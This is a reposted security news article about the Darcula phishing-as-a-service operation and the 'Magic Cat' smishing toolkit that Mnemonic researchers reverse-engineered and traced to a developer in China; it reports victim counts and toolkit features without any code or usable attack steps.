Darcula Phishing as a Service Operation Snares 800,000+ Victims

Posted on by Admin
Darcula Phishing as a Service Operation Snares 800,000+ Victims

Related Post


Security researchers have lifted the lid on a prolific phishing-as-a-service (PhaaS) operation which victimized hundreds of thousands of people in just a few months.

Darcula is designed to target iPhone and Android users with phishing messages – spoofing brands to trick them into handing over card details, according to Norwegian security firm Mnemonic.

Operating globally, it convinces victims to click through on SMS, RCS and iMessage texts impersonating brands such as delivery firms. Victims are asked to pay delivery charges to receive their ‘package,’ pay road toll fees and more.

Previous reports on the operation have highlighted its continued evolution, to include new features like generative AI to create customized smishing campaigns, as well as anti-forensics capabilities.

Read more on PhaaS: UK Police Lead Disruption of £1m Phishing-as-a-Service Site LabHost

However, Mnemonic was able to use reverse engineering techniques to discover the “backbone” of the operation: a powerful toolkit dubbed “Magic Cat.”

In a joint investigation with Norwegian broadcaster NRK, they were able to trace this package back to a 24-year-old from Henan province in China.

An estimated 600 cybercrime groups are using the infrastructure, most of which operate in closed Telegram groups, using SIM farms to increase their reach and card terminals to process stolen details. Most appear to be Chinese language natives.

Around 884,000 cards were compromised in this way in just a seven-month period between 2023 and 2024, the researchers claimed.

Exploring Magic Cat

Mnemonic explained that Magic Cat is a feature-rich toolkit developed for non-technical buyers to scale smishing campaigns.

“At the time, this included out-of-the-box support to impersonate a few hundred brands in countries around the world. Recent updates to the platform are reported to have made building custom brand templates even more user friendly for operators,” it said.

“Magic Cat also streamed data entered by victims in real-time to the operators, allowing them to see character-by-character the data that was entered into the phishing sites. It allows operators to also request PIN codes in real-time, easily integrate towards SMS gateways, amongst many other features.”

Law enforcement authorities in various jurisdictions have been notified.



Source link

Leave a Comment